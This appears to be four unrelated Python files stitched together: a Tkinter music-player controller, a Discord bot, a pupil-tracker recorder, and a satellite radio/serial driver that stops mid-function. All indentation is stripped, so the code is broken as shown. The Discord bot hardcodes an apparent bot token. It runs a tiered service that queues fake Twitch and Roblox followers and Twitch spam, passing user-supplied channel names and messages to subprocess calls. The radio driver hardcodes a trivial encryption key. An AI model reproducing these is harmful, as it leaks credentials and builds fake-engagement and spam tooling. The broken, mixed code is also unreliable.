Controls.py | # This Program Is Created Only For Practise and Educational Purpose Only
# This Program Is Created By S.S.B
# This Program Is Completely Free And Open Source
__author__='''
S.S.B
surajsinghbisht054@gmail.com
https://bitforestinfo.blogspot.com
'''
#
#
##################################################
######## Please Don't Remove Author Name #########
############### Thanks ###########################
##################################################
#
#
# Here Importing Modules
from Configuration_base import *
try:
import Tkinter, ttk
except:
import tkinter as Tkinter
import tkinter.ttk as ttk
import player, ListPanel, DisplayPanel, os, threading, time
class Controls:
def __init__(self, root, playing, player, volume):
self.playervolume=volume
self.root=Tkinter.Frame(root)
self.root.pack()
self.status=Tkinter.IntVar() # For Song Status
self.playing=playing
self.player=player
self.var=Tkinter.IntVar() # For Volume Bar
self.var.set(1.0)
self.songtime=Tkinter.IntVar()
self.create_control_panel()
#self.time_thread()
#print self.player.playing
def time_thread(self):
threading.Thread(target=self.update_time_).start()
return
def update_time_(self):
while True:
time.sleep(2)
if self.player.player.playing:
pass
else:
try:
print ('Playing Next Music')
self.Next()
pass
except Exception as e:
print ('Playing Next Music- Error',e)
pass
def create_control_panel(self):
frame=Tkinter.LabelFrame(self.root)
frame.pack(expand='yes',fill='x',side='top')
add_fileicon=Tkinter.PhotoImage(file="../Icons/add_file.gif")
add_directoryicon=Tkinter.PhotoImage(file="../Icons/add_directory.gif")
exiticon=Tkinter.PhotoImage(file="../Icons/exit.gif")
playicon=Tkinter.PhotoImage(file="../Icons/play.gif")
pauseicon=Tkinter.PhotoImage(file="../Icons/pause.gif")
stopicon=Tkinter.PhotoImage(file="../Icons/stop.gif")
rewindicon=Tkinter.PhotoImage(file="../Icons/rewind.gif")
fast_forwardicon=Tkinter.PhotoImage(file="../Icons/fast_forward.gif")
previous_trackicon=Tkinter.PhotoImage(file="../Icons/previous_track.gif")
next_trackicon=Tkinter.PhotoImage(file="../Icons/next_track.gif")
self.muteicon=Tkinter.PhotoImage(file="../Icons/mute.gif")
self.unmuteicon=Tkinter.PhotoImage(file="../Icons/unmute.gif")
delete_selectedicon=Tkinter.PhotoImage(file="../Icons/delete_selected.gif")
list_file=[
(playicon,'self.play'),
(pauseicon,'self.pause'),
(stopicon,'self.stop'),
(previous_trackicon,'self.previous'),
(rewindicon,'self.rewind'),
(fast_forwardicon,'self.fast'),
(next_trackicon,'self.Next'),]
for i,j in list_file:
storeobj=ttk.Button(frame, image=i,command=eval(j))
storeobj.pack(side='left')
storeobj.image=i
self.volume_label=Tkinter.Button(frame,image=self.unmuteicon)
self.volume_label.image=self.unmuteicon
volume=ttk.Scale(frame,from_=Volume_lowest_value, to=Volume_highest_value ,variable=self.var, command=self.update_volume)
volume.pack(side='right', padx=10, )
self.volume_label.pack(side='right')
return
def update_volume(self, event=None):
if Volume_lowest_value==self.var.get():
self.volume_label.config(state='active')
self.volume_label.config(image=self.muteicon)
self.playervolume.set(0.0)
self.volume_label.config(state='disabled')
else:
self.volume_label.config(state='active')
self.volume_label.config(image=self.unmuteicon)
self.playervolume.set(self.volume_equalize())
self.volume_label.config(state='disabled')
return
def volume_equalize(self):
if len(str(self.var.get()))==1:
val='0.{}'.format(str(self.var.get()))
elif len(str(self.var.get()))==2:
val='{}.{}'.format(str(self.var.get())[0],str(self.var.get())[1])
else:
val=self.var.get()
return float(val)
def mute(self):
self.var.set(0)
return self.update_volume()
def unmute(self):
self.var.set(11)
return self.update_volume()
def increase_volume(self):
high=Volume_highest_value-5
if self.var.get() < high:
store=self.var.get()+5
self.var.set(store)
return self.update_volume()
def decrease_volume(self):
low=6
if self.var.get() > low :
store=self.var.get()-5
self.var.set(store)
return self.update_volume()
def play(self):
if self.status.get()==0:
k=self.player.play_song()
self.status.set(1)
return k
elif self.status.get()==1:
k=self.player.play()
self.status.set(0)
return k
else:
print ('something wrong on controls.Controls.play')
print ('or playing variable is empty')
return 'Nothing'
def pause(self):
if self.status.get()==0 or self.status.get()==1:
self.player.pause()
return
def stop(self):
self.player.stop()
return
def previous(self):
try:
dirbase=os.path.dirname(self.playing.get())
dirt=os.listdir(dirbase)
base=os.path.basename(self.playing.get())
k=dirt.index(base)-1
path=os.path.join(dirbase, dirt[k])
print (path)
self.playing.set(path)
pass
except:
pass
def fast(self):
return self.player.fast_forward()
def Next(self):
try:
dirbase=os.path.dirname(self.playing.get())
dirt=os.listdir(dirbase)
base=os.path.basename(self.playing.get())
k=dirt.index(base)-1
path=os.path.join(dirbase, dirt[k])
print (path)
self.playing.set(path)
pass
except:
pass
def rewind(self):
return self.player.rewind()
class Main:
def __init__(self, root=None):
self.root=Tkinter.Frame(root)
self.root.pack(side='top')
self.path=Tkinter.StringVar() # For Song Path
self.song_time=Tkinter.StringVar() # For Song Playing Time
self.song_duration=Tkinter.StringVar() # For Song Duration
self.volume=Tkinter.IntVar() # For Song Volume
# ============= Creating Media Player ======================================================
mediaplayer=player.mediaplayer(self.path, self.song_time, self.song_duration, self.volume)
# ============= Creating Display Panel ======================================================
DisplayPanel.Player(self.root, self.path, self.song_time, self.song_duration)
# ============= Creating Control Panel ======================================================
lit2=Controls(self.root, self.path, mediaplayer, self.volume)
self.hook2=lit2
# ============= Here Connecting List Panel ======================================================
lit=ListPanel.main(self.root, self.path)
self.hook=lit.hook
if __name__=='__main__':
root=Tkinter.Tk()
Main(root)
root.mainloop()
|
main.py | from difflib import SequenceMatcher
from discord.ext import commands
from lxml import html
import subprocess
import threading
import discord
import asyncio
import aiohttp
import random
import ctypes
import re
import os
import keep_alive
token = 'OTA0OTM1ODMzMjUyMDA3OTk4.YYCxKw.eD-5O7QBXiNPl5w1CrhCwMHLW24'
prefix = '/'
intents = discord.Intents().all()
bot = commands.Bot(command_prefix=prefix, case_insensitive=True, intents=intents)
bot.remove_command('help')
administrators = [499218322261540865]
chat_channel = 835851484281176077
bots_channel = 835851858903695370
queue = []
def zoom():
while True:
try:
task, arg1, arg2 = queue.pop(0).split('-')
subprocess.run([f'{task}', f'{arg1}', f'{arg2}'])
except:
pass
threading.Thread(target=zoom).start()
@bot.event
async def on_ready():
print(f'Servers: {len(bot.guilds)}')
for guild in bot.guilds:
print(guild.name)
print()
# bot.loop.create_task(status())
while True:
members = sum([guild.member_count for guild in bot.guilds])
activity = discord.Activity(type=discord.ActivityType.watching, name=f'{members} users | ! twent v3')
await bot.change_presence(activity=activity)
await asyncio.sleep(60)
@bot.event
async def on_member_join(member):
channel = await bot.fetch_channel(bots_channel)
await channel.send(f'Welcome to **Twent**, {member.mention}.\nType `/help` to get started! Yey!')
@bot.event
async def on_command_error(ctx, error: Exception):
if ctx.channel.id == bots_channel:
if isinstance(error, commands.CommandOnCooldown):
embed = discord.Embed(color=16379747, description=f'{error}')
await ctx.send(embed=embed)
elif isinstance(error, commands.MissingRequiredArgument):
embed = discord.Embed(color=16379747, description='You are missing arguments required to run this command!')
await ctx.send(embed=embed)
ctx.command.reset_cooldown(ctx)
elif 'You do not own this bot.' in str(error):
embed = discord.Embed(color=16379747, description='You do not have permission to run this command!')
await ctx.send(embed=embed)
else:
print(str(error))
else:
try:
await ctx.message.delete()
except:
pass
@bot.command()
async def help(ctx):
print(f'{ctx.author} | {ctx.author.id} -> /help')
if ctx.channel.type != discord.ChannelType.private:
embed = discord.Embed(color=16777215)
embed.add_field(name='🎨 Help', value='`/help`', inline=True)
embed.add_field(name='🎃 Tasks', value='`/tasks`', inline=True)
embed.add_field(name='🎉 Twitch Followers', value='`/tfollow (channel)`', inline=True)
embed.add_field(name='✨ Twitch Spam', value='`/tspam (channel) (message)`', inline=True)
embed.add_field(name='🔮 Roblox Followers', value='`/rfollow (user id)`', inline=True)
await ctx.send(embed=embed)
@bot.command()
async def ticket(ctx):
print(f'{ctx.author} | {ctx.author.id} -> /ticket')
if ctx.channel.type != discord.ChannelType.private:
channels = [str(x) for x in bot.get_all_channels()]
if f'ticket-{ctx.author.id}' in str(channels):
embed = discord.Embed(color=16379747, description='You already have a ticket open!')
await ctx.send(embed=embed)
else:
ticket_channel = await ctx.guild.create_text_channel(f'ticket-{ctx.author.id}')
await ticket_channel.set_permissions(ctx.guild.get_role(ctx.guild.id), send_messages=False, read_messages=False)
await ticket_channel.set_permissions(ctx.author, send_messages=True, read_messages=True, add_reactions=True, embed_links=True, attach_files=True, read_message_history=True, external_emojis=True)
embed = discord.Embed(color=16379747, description='Please enter the reason for this ticket, type `/close` if you want to close this ticket.')
await ticket_channel.send(f'{ctx.author.mention}', embed=embed)
await ctx.message.delete()
@bot.command()
async def close(ctx):
print(f'{ctx.author} | {ctx.author.id} -> /close')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.name == f'ticket-{ctx.author.id}':
await ctx.channel.delete()
elif ctx.author.id in administrators and 'ticket' in ctx.channel.name:
await ctx.channel.delete()
else:
embed = discord.Embed(color=16777215, description=f'You do not have permission to run this command!')
await ctx.send(embed=embed)
@bot.command()
async def tasks(ctx):
print(f'{ctx.author} | {ctx.author.id} -> /tasks')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel:
embed = discord.Embed(color=16777215, description=f'`{len(queue)}` tasks in the queue!')
await ctx.send(embed=embed)
else:
await ctx.message.delete()
tfollow_cooldown = []
@bot.command()
@commands.cooldown(1, 100, type=commands.BucketType.user)
async def tfollow(ctx, channel, amount: int=None):
print(f'{ctx.author} | {ctx.author.id} -> /tfollow {channel}')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel or ctx.author.id in administrators:
if str(channel.lower()) in tfollow_cooldown and ctx.author.id not in administrators:
try:
await ctx.message.delete()
except:
pass
else:
try:
if '-' in str(channel):
raise Exception
max_amount = 0
if ctx.author.id in administrators:
tfollow.reset_cooldown(ctx)
max_amount += 1000
premium = discord.utils.get(ctx.guild.roles, name='Premium')
if premium in ctx.author.roles:
max_amount += 1000
diamond = discord.utils.get(ctx.guild.roles, name='Diamond')
if diamond in ctx.author.roles:
max_amount += 750
gold = discord.utils.get(ctx.guild.roles, name='Gold')
if gold in ctx.author.roles:
max_amount += 450
silver = discord.utils.get(ctx.guild.roles, name='Silver')
if silver in ctx.author.roles:
max_amount += 250
bronze = discord.utils.get(ctx.guild.roles, name='Bronze')
if bronze in ctx.author.roles:
max_amount += 100
booster = discord.utils.get(ctx.guild.roles, name='#boost')
if booster in ctx.author.roles:
max_amount += 5000
_75 = discord.utils.get(ctx.guild.roles, name='Premium+')
if _75 in ctx.author.roles:
max_amount += 1000
_25 = discord.utils.get(ctx.guild.roles, name='+25')
if _25 in ctx.author.roles:
max_amount += 25
_10 = discord.utils.get(ctx.guild.roles, name='+10')
if _10 in ctx.author.roles:
max_amount += 10
_5 = discord.utils.get(ctx.guild.roles, name='+5')
if _5 in ctx.author.roles:
max_amount += 5
max_amount += 50
if amount is None:
amount = max_amount
elif amount > max_amount:
amount = max_amount
if amount <= max_amount:
premium = discord.utils.get(ctx.guild.roles, name='Premium')
if premium in ctx.author.roles:
position = len(queue) + 1
# embed = discord.Embed(color=16379747, description=f'Added `tfollow-{channel}-{amount}` to queue! (`1/{position}`)')
embed = discord.Embed(color=16777215, description=f'Adding `{amount}` followers to `{channel}`! (`1/{position}`)')
await ctx.send(embed=embed)
queue.insert(0, f'tfollow-{channel}-{amount}')
else:
position = len(queue) + 1
# embed = discord.Embed(color=16379747, description=f'Added `tfollow-{channel}-{amount}` to queue! (`{position}/{position}`)')
embed = discord.Embed(color=16379747, description=f'Adding `{amount}` followers to `{channel}`! (`1/{position}`)')
await ctx.send(embed=embed)
queue.append(f'tfollow-{channel}-{amount}')
if ctx.author.id not in administrators:
tfollow_cooldown.append(str(channel.lower()))
await asyncio.sleep(300)
tfollow_cooldown.remove(str(channel.lower()))
except:
embed = discord.Embed(color=16379747, description=f'Error, try again `{channel}`!')
await ctx.send(embed=embed)
tfollow.reset_cooldown(ctx)
else:
await ctx.message.delete()
tfollow.reset_cooldown(ctx)
@bot.command()
@commands.cooldown(1, 600, type=commands.BucketType.user)
async def tspam(ctx, channel, *, msg):
print(f'{ctx.author} | {ctx.author.id} -> /tspam {channel} {msg}')
if ctx.channel.type != discord.ChannelType.private:
premium = discord.utils.get(ctx.guild.roles, name='Premium')
if premium in ctx.author.roles:
if ctx.channel.id == bots_channel:
try:
max_amount = 0
if ctx.author.id in administrators:
tspam.reset_cooldown(ctx)
max_amount += 25
amount = None
if amount is None:
amount = max_amount
if amount <= max_amount:
position = len(queue) + 1
embed = discord.Embed(color=16379747, description=f'Added `tspam-{channel}-{msg}` to queue!')
await ctx.send(embed=embed)
queue.insert(0, f'tspam-{channel}-{msg}')
except:
embed = discord.Embed(color=16379747, description=f'Added `tspam {channel} {msg}` to queue! ')
await ctx.send(embed=embed)
tspam.reset_cooldown(ctx)
else:
await ctx.message.delete()
tspam.reset_cooldown(ctx)
else:
embed = discord.Embed(color=16379747, description='You do not have permission to run this command!')
await ctx.send(embed=embed)
rfollow_cooldown = []
@bot.command()
@commands.cooldown(1, 600, type=commands.BucketType.user)
async def rfollow(ctx, user_id, amount: int=None):
print(f'{ctx.author} | {ctx.author.id} -> /rfollow {user_id}')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel or ctx.author.id in administrators:
if str(user_id) in rfollow_cooldown and ctx.author.id not in administrators:
try:
await ctx.message.delete()
except:
pass
else:
try:
int(user_id)
max_amount = 0
if ctx.author.id in administrators:
rfollow.reset_cooldown(ctx)
max_amount += 5000
max_amount += 25
if amount is None:
amount = max_amount
elif amount > max_amount:
amount = max_amount
if amount <= max_amount:
premium = discord.utils.get(ctx.guild.roles, name='Premium')
if premium in ctx.author.roles:
position = len(queue) + 1
embed = discord.Embed(color=16777215, description=f'Adding `{amount}` followers to `{user_id}`! (`1/{position}`)')
await ctx.send(embed=embed)
queue.insert(0, f'rfollow-{user_id}-{amount}')
else:
position = len(queue) + 1
embed = discord.Embed(color=16777215, description=f'Adding `{amount}` followers to `{user_id}`! (`{position}/{position}`)')
await ctx.send(embed=embed)
queue.append(f'rfollow-{user_id}-{amount}')
if ctx.author.id not in administrators:
rfollow_cooldown.append(str(user_id))
await asyncio.sleep(600)
rfollow_cooldown.remove(str(user_id))
except:
embed = discord.Embed(color=16379747, description='An error has occured while attempting to run this command!')
await ctx.send(embed=embed)
rfollow.reset_cooldown(ctx)
else:
await ctx.message.delete()
rfollow.reset_cooldown(ctx)
@bot.command()
async def trivia(ctx):
print(f'{ctx.author} | {ctx.author.id} -> /trivia')
if ctx.channel.type != discord.ChannelType.private:
if ctx.author.id in administrators:
await ctx.message.delete()
async with aiohttp.ClientSession() as session:
while True:
try:
# question, answer = random.choice(list(questions.items()))
while True:
async with session.get('https://opentdb.com/api.php?amount=1&type=multiple') as r:
r = await r.json()
question = html.fromstring(str(r['results'][0]['question'])).text_content()
answer = r['results'][0]['correct_answer']
if 'which' in question.lower():
pass
else:
break
embed = discord.Embed(color=16379747, description=f'**{question}**\n\nReward: **1080 twitch followers**')
await ctx.send(embed=embed)
def check(message: discord.Message):
return str(message.content).lower() == str(answer).lower()
return SequenceMatcher(None, str(answer).lower(), str(message.content).lower()).ratio() > float(0.5) and message.channel.id == chat_channel
_answer = await bot.wait_for('message', check=check, timeout=20)
try:
embed = discord.Embed(color=16379747, description=f'{_answer.author.mention} has answered the question correctly!\n\nAnswer: **{answer}**')
await ctx.send(embed=embed)
embed = discord.Embed(color=16379747, description=f'{_answer.author.mention} send your twitch channel to claim the reward!')
await ctx.send(embed=embed)
def _check(message: discord.Message):
return message.author.id == _answer.author.id and message.channel.id == chat_channel
_channel = await bot.wait_for('message', check=_check, timeout=20)
queue.append(f'tfollow-{_channel.content}-50')
except asyncio.TimeoutError:
pass
except asyncio.TimeoutError:
embed = discord.Embed(color=16379747, description=f'Nobody answered the question correctly.\n\nCorrect Answer: **{answer}**')
await ctx.send(embed=embed)
except:
pass
await asyncio.sleep(5)
else:
await ctx.message.delete()
keep_alive.keep_alive()
bot.run(token)
|
capture_pupil.py | from pylsl import StreamInlet, resolve_byprop, local_clock, TimeoutError
import zmq
from zmq.utils.monitor import recv_monitor_message
import msgpack as serializer
import pupil.pupil_src.capture as pupil_capture
from multiprocessing import Process, Queue
import signal, sys, os, time, csv
import serial
import threading
samples_lock = threading.Lock()
LSL_STREAM_NAME = 'psychopy'
LSL_STREAM_TYPE = 'marker'
pupil_tracker = None
class PupilTracker(object):
def __init__(self):
pupil_queue = Queue()
self.pupil_proc = Process(target=pupil_capture.alternate_launch,
args=((pupil_queue), ))
self.pupil_proc.start()
while True:
pupil_msg = pupil_queue.get()
print(pupil_msg)
if 'tcp' in pupil_msg:
self.ipc_sub_url = pupil_msg
if 'EYE_READY' in pupil_msg:
break
context = zmq.Context()
self.socket = zmq.Socket(context, zmq.SUB)
monitor = self.socket.get_monitor_socket()
self.socket.connect(self.ipc_sub_url)
while True:
status = recv_monitor_message(monitor)
if status['event'] == zmq.EVENT_CONNECTED:
break
elif status['event'] == zmq.EVENT_CONNECT_DELAYED:
pass
print('Capturing from pupil on url %s.' % self.ipc_sub_url)
self.socket.subscribe('pupil')
# setup LSL
streams = resolve_byprop('name', LSL_STREAM_NAME, timeout=2.5)
try:
self.inlet = StreamInlet(streams[0])
except IndexError:
raise ValueError('Make sure stream name="%s", is opened first.'
% LSL_STREAM_NAME)
self.running = True
self.samples = []
# LSL and pupil samples are synchronized to local_clock(), which is the
# runtime on this slave, not the host
def _record_lsl(self):
while self.running:
sample, timestamp = self.inlet.pull_sample(timeout=5)
# time correction to sync to local_clock()
try:
if timestamp is not None and sample is not None:
timestamp = timestamp + self.inlet.time_correction(timeout=5)
samples_lock.acquire()
self.samples.append(('STIM', timestamp, sample))
samples_lock.release()
except TimeoutError:
pass
print('closing lsl on the pupil side')
self.inlet.close_stream()
def _record_pupil(self):
while self.running:
topic = self.socket.recv_string()
payload = serializer.loads(self.socket.recv(), encoding='utf-8')
samples_lock.acquire()
self.samples.append(('pupil', local_clock(), payload['diameter']))
samples_lock.release()
print('Terminating pupil tracker recording.')
def capture(self):
self.pupil_thread = threading.Thread(target=self._record_pupil)
self.lsl_thread = threading.Thread(target=self._record_lsl)
self.pupil_thread.start()
self.lsl_thread.start()
def export_data(self):
self.running = False
self.pupil_thread.join(5)
self.lsl_thread.join(5)
print('Joined threads, now outputting pupil data.')
i = 0
while os.path.exists("data/pupil/data-%s.csv" % i):
i += 1
# csv writer with stim_type, msg, and timestamp, then data
with open('data/pupil/data-%s.csv' % i, 'w+') as f:
writer = csv.writer(f)
writer.writerow(('Signal Type', 'Msg', 'Time', 'Channel 1', 'Channel 2', 'Channel 3', 'Channel 4', 'Channel 5', 'Channel 6', 'Channel 7', 'Channel 8' ))
for sample in self.samples:
signal_type, timestamp, datas = sample
out = (signal_type, 'msg', timestamp)
for data in datas:
out = out + (data,)
writer.writerow(out)
def __str__(self):
return 'Pupil tracker listening to %s' % self.ipc_sub_url
def __del__(self):
try:
self.inlet.close_stream()
except AttributeError:
raise AttributeError('self.inlet does not exist. Most likely the LSL stimuli stream was not opened yet.')
self.pupil_proc.terminate()
def load(queue):
try:
global pupil_tracker
pupil_tracker = PupilTracker()
except:
if queue is not None:
queue.put('FAIL')
print('failed to initailize pupil process')
def start():
pupil_tracker.capture()
def stop():
pupil_tracker.export_data()
os._exit(0) # dirty, but it's ok because everything is already cleaned up
def sigint_handler(signal, frame):
stop()
def sigterm_handler(signal, frame):
print('Pupil got terminate signal, now terminating threads.')
stop()
def main():
signal.signal(signal.SIGINT, sigint_handler)
signal.signal(signal.SIGTERM, sigterm_handler)
load(queue=None)
# Required message for subprocess comms
print('CONNECTED')
start()
signal.pause()
def begin(queue):
signal.signal(signal.SIGTERM, sigterm_handler)
load(queue)
queue.put('CONNECTED')
start()
signal.pause()
if __name__ == '__main__':
main()
|
comms.py | ###################################################################################
# @file comms.py
###################################################################################
# _ _____ ____ ____ _____
# | |/ /_ _/ ___|| _ \| ____|
# | ' / | |\___ \| |_) | _|
# | . \ | |___ ) | __/| |___
# |_|\_\___|____/|_| |_____|
###################################################################################
# Copyright (c) 2020 KISPE Space Systems Ltd.
#
# Please follow the following link for the license agreement for this code:
# www.kispe.co.uk/projectlicenses/RA2001001003
###################################################################################
# Created on: 06-May-2021
# Mercury GS Serial Driver
# @author: Jamie Bayley (jbayley@kispe.co.uk)
###################################################################################
import queue
import struct
import threading
from enum import Enum
import serial
import config
from low_level.frameformat import PROTOCOL_DELIMITER, MAX_DATA_TYPES, DataType, DataTypeSize
from config import RaspberryPi
try:
# If this succeeds then we are using a Raspberry Pi
from config import GPIO
except ImportError:
pass
# If this succeeds then we are using a RFM69
try:
import adafruit_rfm69
except ImportError:
pass
import sys
import signal
if RaspberryPi is True:
try:
import board as bonnet
import busio
from digitalio import DigitalInOut, Direction, Pull
# Configure Packet Radio
CS = DigitalInOut(bonnet.CE1)
RESET = DigitalInOut(bonnet.D25)
spi = busio.SPI(bonnet.SCK, MOSI=bonnet.MOSI, MISO=bonnet.MISO)
except (NotImplementedError, NameError) as err:
print(repr(err))
#spi = None
#CS = None
#RESET = None
frame_queue = queue.Queue()
direct_read_queue = queue.Queue()
incoming_byte_queue = queue.Queue()
comms_handler = None
PENDING_FRAME = 0
GATHERING_DATA = 1
READING_DATA = 2
DIRECT_READ = 3
DIO0_GPIO = 22
def signal_handler(sig, frame):
if RaspberryPi is True:
GPIO.cleanup()
sys.exit(0)
def comms_register_callback(exception_handler_function_ptr):
""" Registers the callbacks for this module to pass data back to previous modules. """
global callback_exception_handler
# Set exception handler callback
callback_exception_handler = exception_handler_function_ptr
class CommsHandler:
""" A Class to handle the comms and rx_state_machine. """
def __init__(self, port, baud_rate):
""" Initialise the rx_listener and serial. """
self.rx_state_machine = StateMachine()
if RaspberryPi is True:
self.radio = RadioComms(spi, CS, RESET, 434.0)
self.serial = SerialComms(config.COM_PORT, config.BAUD_RATE)
try:
class RadioComms(adafruit_rfm69.RFM69):
""" A Class to handle the radio comms. """
def __init__(self, spi, chip_select, reset, frequency):
super().__init__(spi, chip_select, reset, frequency)
self.encryption_key = b'\x01\x02\x03\x04\x05\x06\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08'
self.is_open = True # Hack JPB
self.in_waiting = 0 # Hack JPB
self.listen()
def rx_interrupt(self, channel):
if (self.payload_ready() == True):
received_packet = self.receive(timeout=10)
if received_packet is not None:
print("RECEIVED: " + str(received_packet))
packet_split = struct.unpack(str(len(received_packet)) + "c", received_packet)
for byte in packet_split:
incoming_byte_queue.put(byte)
except NameError:
pass
class SerialComms(serial.Serial):
""" A Class to handle the serial comms through a UART. """
def __init__(self, port, baud_rate):
""" Initialise serial interface, set bytesize and write_timeout values. """
try:
super().__init__(port, baud_rate)
except serial.serialutil.SerialException as err:
print(repr(err))
self.bytesize = 8
self.write_timeout = 5
self.rx_thread = threading.Thread(target=self.rx_loop)
# Close COM Port if open
if self.is_open:
self.close()
# Open COM Port
try:
self.open()
self.rx_thread.start()
except serial.serialutil.SerialException as err:
print(repr(err))
def rx_loop(self):
rx_byte = self.read(1)
incoming_byte_queue.put(rx_byte)
def check_baud_rate(self, requested_baud_rate):
""" Check that the baud rate requested is not already set. """
if self.baudrate is not requested_baud_rate:
return requested_baud_rate
def send(self, data_to_send):
""" Send data over the COM Port. """
try:
self.write(data_to_send)
except serial.serialutil.SerialTimeoutException as err:
print(repr(err))
print("ERROR: Write Has Timed Out")
callback_exception_handler("ERROR: Write Has Timed Out")
except serial.serialutil.PortNotOpenError as err:
print(repr(err))
print("ERROR: Port " + config.COM_PORT + " Not Open")
callback_exception_handler("ERROR: Port" + config.COM_PORT + " Not Open")
except serial.serialutil.SerialException as err:
print(repr(err))
print("ERROR: The handle is invalid")
callback_exception_handler("ERROR: The handle is invalid")
class StateMachineState(Enum):
""" DataType class for each possible data type. """
PENDING_FRAME = 1
GATHERING_HEADER = 2
READING_DATA = 3
class StateMachine(threading.Thread):
""" StateMachine Class for the RX_Listener running on a separate Thread. """
def __init__(self):
""" Initialise Thread, buffer and checking variables. """
super().__init__()
self.frame_buffer = bytearray()
self.delimiter_received = False
self.test_listen = False
self.daemon = True
self.state = StateMachineState.PENDING_FRAME.value
self.gathered_header = bytearray()
self.header_count = 0
self.data_length_count = 0
self.data_length_bytes = bytearray()
self.data_length = 0
self.got_data_length = False
self.data_count = 0
self.data_bytes = bytearray()
def run(self):
""" Overloads the Thread's "run" function,
reads directly if Test Interface is used,
otherwise engages StateMachine.
"""
while True:
if self.test_listen is True:
self.direct_read()
else:
self.run_state_machine()
def run_state_machine(self):
rx_byte = incoming_byte_queue.get()
if self.state == StateMachineState.PENDING_FRAME.value:
self.pending_frame(rx_byte)
elif self.state == StateMachineState.GATHERING_HEADER.value:
self.gathering_header(rx_byte)
elif self.state == StateMachineState.READING_DATA.value:
self.reading_data(rx_byte)
else:
self.state = StateMachineState.PENDING_FRAME.value
def pending_frame(self, rx_byte):
""" PENDING_FRAME State, checks for start of frame...
(delimiter character followed by non delimiter character).
"""
try:
# Clear the received data buffer if it's 2 bytes
if len(self.frame_buffer) == 2:
self.frame_buffer.clear()
except TypeError as err:
print("ERROR: ", err)
print("FIRST PASS")
# Add byte to the frame buffer
self.frame_buffer += rx_byte
# Check if we have received a 0x55 followed by a non-0x55
if (PROTOCOL_DELIMITER == self.frame_buffer[0]) and (rx_byte[0] != PROTOCOL_DELIMITER):
# This is the start of a new frame!
# Switch state to GATHERING_DATA
self.state = StateMachineState.GATHERING_HEADER.value
self.header_count = 0
else:
# Reenter PENDING_FRAME if start of frame not detected
pass
def gathering_header(self, rx_byte):
""" GATHERING_HEADER State, reads the rest of the header. """
# Create header bitfield buffer
header_size = 3
# Read a byte into Header Buffer
self.gathered_header += rx_byte
# Scan byte and previous byte for start of frame, pop off any double delimiter values
self.gathered_header, self.header_count = self.delimiter_scan_and_remove(self.gathered_header,
self.header_count)
# If we've read out enough bytes of the header
if self.header_count == header_size:
# Append gathered header onto buffer
self.frame_buffer.extend(self.gathered_header)
self.gathered_header.clear()
# Check if Data Type is within range
if int(self.frame_buffer[4]) in range(MAX_DATA_TYPES):
# Data Type within range, switch to READING_DATA state
self.state = StateMachineState.READING_DATA.value
else:
# Data Type out of range, discard message and return to PENDING_FRAME
self.state = StateMachineState.PENDING_FRAME.value
self.frame_buffer.clear()
def reading_data(self, rx_byte):
""" READING_DATA State, gathers the data length field and reads the rest of the frame,
then if frame is valid place onto queue to be processed by the packet handler Thread.
"""
# Create data length bitfield buffer
data_length_size = 4
# Iterate over Data Length bytes
if self.data_length_count < data_length_size:
# Read a byte into Data Length Buffer
self.data_length_bytes += rx_byte
# Scan byte and previous byte for start of frame, pop off any double delimiter values
self.data_length_bytes, self.data_length_count = self.delimiter_scan_and_remove(self.data_length_bytes,
self.data_length_count)
else:
if self.got_data_length is False:
# unpacks data_length_bytes into 32 bit unsigned integer
try:
self.data_length = struct.unpack("!L", self.data_length_bytes)[0]
except struct.error as err:
print(repr(err))
print("ERROR: Data Length is not 4 bytes")
callback_exception_handler("ERROR: Data Length is not 4 bytes")
self.got_data_length = True
# Read a byte into Data Buffer
self.data_bytes += rx_byte
# Scan byte and previous byte for start of frame, pop off any double delimiter values
self.data_bytes, self.data_count, self.data_length = self.delimiter_scan_and_remove(self.data_bytes,
self.data_count,
True,
self.data_length)
# If we have read out enough data bytes
if self.data_count == self.data_length:
invalid_frame = False
data_type = self.frame_buffer[4]
# Check the data type against all known data types
if not any(x.value == data_type for x in DataType):
invalid_frame = True
callback_exception_handler("ERROR: Frame Data Type Field does not match actual type.")
# Get the data type name to use with comparing against the right data length
data_type_key = DataType(data_type).name
# Check the actual data length against the expected length for the data type
if self.data_length != DataTypeSize[data_type_key].value:
invalid_frame = True
callback_exception_handler("ERROR: Frame Data Length Field does not match actual length.")
if invalid_frame is False:
# Append data length and data fields onto frame buffer
self.frame_buffer.extend(self.data_length_bytes + self.data_bytes)
# Add Frame onto queue to be processed by packet handler Thread
frame_queue.put(self.frame_buffer)
# Block until packet is processed in handler Thread
frame_queue.join()
# Frame has been fully processed,
# Reset all member variables so that the state machine can process the next frame
self.header_count = 0
self.gathered_header.clear()
self.data_length = 0
self.data_length_bytes.clear()
self.data_length_count = 0
self.data_length = 0
self.data_bytes.clear()
self.data_count = 0
self.got_data_length = False
self.delimiter_received = False
# Set state to PENDING_FRAME
self.state = StateMachineState.PENDING_FRAME.value
# Clear the frame buffer
self.frame_buffer.clear()
def direct_read(self, com):
""" DIRECT_READ State, entered if Test Interface is used to bypass State Machine """
# Block until there is a byte to read
rx_byte = self.read_byte(com)
# Put byte onto queue
direct_read_queue.put(rx_byte)
@staticmethod
def read_byte(com):
""" Read and return a byte from the COM Port """
rx_byte = com.read(1)
return rx_byte
def delimiter_scan_and_remove(self, buffer, index, data_field=False, data_length_decrement=0):
""" Iterate through buffer, pop off a delimiter where there are 2 consecutive delimiter values,
enter GATHERING_HEADER State if start of frame detected.
"""
# If this byte is a delimiter
if PROTOCOL_DELIMITER is buffer[index]:
# and we haven't received a prior delimiter
if self.delimiter_received is False:
# Record that this byte is a delimiter
self.delimiter_received = True
# and we've received a prior valid delimiter
else:
# Discard the byte
buffer.pop(index)
# Rewind indexer to maintain stepping
index -= 1
if data_field is True:
# Add to data_length decrementer HERE to then take off data_length after entire read
data_length_decrement -= 1
# Set state to wait for next delimiter
self.delimiter_received = False
# If this byte is not a delimiter
else:
# and we have received a prior delimiter that makes this an invalid sequence
if self.delimiter_received is True:
# This is the start of a new frame!
# Set the frame buffer to this new frame
self.frame_buffer = buffer
# Reset received delimiter variable
self.delimiter_received = False
# Enter GATHERING_HEADER state
self.state = StateMachineState.GATHERING_HEADER.value
self.header_count = 0
return buffer, 0
# Increment the index
index += 1
if data_length_decrement == 0:
return buffer, index
else:
